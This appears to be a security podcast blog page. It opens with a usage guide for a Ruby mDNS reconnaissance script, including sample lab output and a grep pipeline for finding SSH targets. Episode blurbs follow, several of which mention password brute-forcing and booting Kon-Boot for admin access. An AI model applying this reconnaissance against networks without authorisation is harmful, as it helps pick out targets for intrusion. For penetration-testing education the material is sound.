 MDNSRecon Script by Carlos Perez (carlos_perez[at]darkoperator.com)
Version 0.1
Usage: mdnsrecon.rb [OPTION]
 --help, -h:
 show help
 --csv <file>, -c <file>:
 CSV File to save records found.
 --grep, -g:
 Output grepable Output with a delimiter of \
 <service>\domain\host\IP\port\txt
If no option is given it will print records found to standard output.

If ran with no option we get output similar to this one if machines are available:

root@bt:~# ./mdnsrecon.rb 
[-] Records found:
[*] Host: bt.local
[*] IP: 192.168.192.128
[*] Port: 9
[*] Service:Workstation
[*] Text:''
[*] 
[*] Host: ubuntu.local
[*] IP: 192.168.192.129
[*] Port: 9
[*] Service:Workstation
[*] Text:''
[*] 
[*] Host: ubuntu.local
[*] IP: 192.168.192.129
[*] Port: 22
[*] Service:_udisks-ssh._tcp
[*] Text:''
[*]

If We want the output in a grepable format we use the -g options so the cut command and grep can be used to better find targets, in this example we will look for SSH services:

root@bt:~# ./mdnsrecon.rb -g | grep ssh |cut -d '\' -f4,5 --output-delimiter=" " -n
192.168.192.129 22

Now in the case we want to save the results in a format we can email someone or parse a larger set of results like those you can find on a conference floor ( or so I was told) you can select to save to a CSV file and later user a spreadsheet program or PowerShell on Windows to parse and slice:

root@bt:~# ./mdnsrecon.rb -c lab.csv
[-] Saving found records to lab.csv
[*] 3 Records saved

root@bt:~# cat lab.csv 
service,domain,host,ip,port,txt
Workstation,local,bt.local,192.168.192.128,9,''
_udisks-ssh._tcp,local,ubuntu.local,192.168.192.129,22,''
Workstation,local,ubuntu.local,192.168.192.129,9,''

So far I'm only supporting Debian, Ubuntu and Backtrack 5 as the platforms to run the script on, recommending Backtrack 5 as the preferred one. I will add other distributions of Linux depending on the amount of requests I get. I do hope you find the script useful and as with any of my projects feedback and feature request are always welcomed.

This segment talks about how to use custom Nmap NSE scripts to discover web services and take a screenshot of the resulting web page. Based on a script made available by Trustwave Spiderlabs:

Episode 295 Show Notes

Episode 295 Part 1 (mp3)

Episode 295 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Randy is the CISO for Virginia Tech and a co-author of the original FBI/SANS Institute "Top 10/20 Internet Security Vulnerabilities" document that has become a standard for most computer security and auditing software. He is the co-author of the SANS Institute's "Responding to DDOS Attacks" document that was prepared at the request of the White House in response to the attacks of 2000. He is also acknowledged as one of the North American masters of the hammer dulcimer:

Episode 295 Show Notes

Episode 295 Part 1 (mp3)

Episode 295 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Malware modifying .htaccess files and so much more:

Episode 295 Show Notes

Episode 295 Part 1 (mp3)

Episode 295 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Episode 295 of PaulDotCom Security Weekly will have on Virginia Tech CSO Randy Marchany to give us his viewpoint on security from a University setting. Come participate in our IRC channel or sit back and enjoy it live via our Ustream channel:

For interactive live video, audio, and chat during each episode you can visit PaulDotCom Live!, just hang out in our IRC channel, or if you prefer, visit the Episode 295 show notes page.

Don't forget to follow us on Twitter: Paul Asadoorian, Larry Pesce, Jack Daniel, Carlos Perez, John Strand and Mike Perez.

Quick tip on how to easily brute-force a password when users are using really lame passwords:

Episode 294 Show Notes

Episode 294 Part 1 (mp3)

Episode 294 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Fun tech segment on how to setup your systems to use PXE and boot Kon-Boot over the network to give you admin access to machines:

Episode 294 Show Notes

Episode 294 Part 1 (mp3)

Episode 294 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Can you stop a targeted attack? CVSS for penetration testers? Gartner, really?

Episode 294 Show Notes

Episode 294 Part 1 (mp3)

Episode 294 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.

Marcus Sachs Interview:

Episode 294 Show Notes

Episode 294 Part 1 (mp3)

Episode 294 Part 2 (mp3)

Tune in to PaulDotCom Security Weekly TV, Hack Naked TV, and Hack Naked At Night episodes on our YouTube Channel or our Bliptv channel.